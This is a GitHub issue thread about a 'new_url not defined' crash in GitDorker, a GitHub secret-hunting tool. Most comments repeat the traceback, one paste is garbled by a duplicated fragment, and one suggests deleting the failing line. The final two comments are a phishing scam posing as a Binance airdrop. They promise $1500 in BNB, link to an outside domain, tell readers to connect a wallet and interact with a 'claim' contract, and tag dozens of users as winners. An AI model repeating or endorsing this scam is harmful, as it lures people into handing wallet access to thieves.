### ISSUE TITLE
NameError new_url not defined

### ISSUE THREAD

**Issue by EviLMang0** [obheda12/GitDorker#32]
[-] Traceback (most recent call last):
  File "/root/Tools/GitDorker/GitDorker.py", line 404, in <module>
    sys.stdout.write(colored('%s' % new_url, 'white'))
NameError: name 'new_url' is not defined

**Comment by jester-thomas** [comment]
[-] Traceback (most recent call last):  
File "/home/kali/Secrets_Hunting/GitDorker/GitDorker.py", line 577, in <module>
    sys.stdout.write(colored('%s' % new_url, 'white'))
NameError: name 'new_url' is not defined

**Comment by libraloge** [comment]
[-] Traceback (most recent call last):
  File "/root/tool/[-] Traceback (most recent call last):
  File "/root/tool/bugbounty/GitDorker/GitDorker.py", line 404, in <module>
    sys.stdout.write(colored('%s' % new_url, 'white'))
NameError: name 'new_url' is not defined
/GitDorker/GitDorker.py", line 404, in <module>
    sys.stdout.write(colored('%s' % new_url, 'white'))
NameError: name 'new_url' is not defined

**Comment by ghost** [comment]
[-] Traceback (most recent call last):
  File "/root/tool/bugbounty/GitDorker/GitDorker.py", line 404, in <module>
    sys.stdout.write(colored('%s' % new_url, 'white'))
NameError: name 'new_url' is not defined

**Comment by ghost** [comment]
go to line number 404 and remove it for else to print'()' it work 

- [ ]

**Comment by chetansalunke123** [comment]
i am also facing this issue now and its not solved.....help me in same issue

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @AD-Amlas, @dan0b, @SoooRaspy, @Karim9210, @SoftChunck, @ubik805, @ZuoRight, @abhishekrch, @wsfung2008, @vincemoke66, @0xFernandoDias, @Max-Frisch, @programmermark, @j3st489, @sky-xyz, @chris-gqz, @Bijan-F, @CH4R4F, @rayeaster, @ayushrtwt, @0x3f97, @darioodiaz, @naeemco, @qintao0203, @Erarnitox, @myaltunay, @diydyq, @dotslashbit, @tls-fanchun, @jd4u, @neagu-dev, @Lipeira, @eroblaze, @aliaksei-niamkovich, @linuxsirn, @mujtabasiddiqui0786, @Usman-Haider-Ali, @tiankonglan, @mahdimp, @Amjin-6161, @kokatmx, @binoybarnabas, @IbrahimSam96, @tyuan511, @o-az, @gslchina, @abidpu19, @flp511, @rihvan, @levinhne

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @aferreira44, @VIPUL1306, @mohibmemon5, @Mayank-Kabra, @mdolancode, @thenua3bhai, @chn24, @jasoncarr95, @amdolaoye, @UiCandy, @gig05281215, @amh22, @joaquimsnjunior, @srdwinu, @bigshelloldsun, @Aruen24, @shashankk204, @sovo-code, @Johnsoncpk, @goccult, @leo-tavares, @makenaichu970413, @SamridhVikhasS, @thedrivingforc, @shijen, @clisterX, @deanurag, @okanisis, @crrtty, @Zannatul-Naim, @quantum-0x, @renso3x, @aldo-verdian, @rakesharumalla, @Ukriyte, @Osarhdim, @abdullahb53, @zhengguiquan, @tamsay, @Bobliew, @liki31, @sashafencyk, @H-xYDdd, @Fiv5, @BetterZ3, @Rupayank, @Glitch8978, @alexandrecoin, @zezhang94, @vishallamba1988
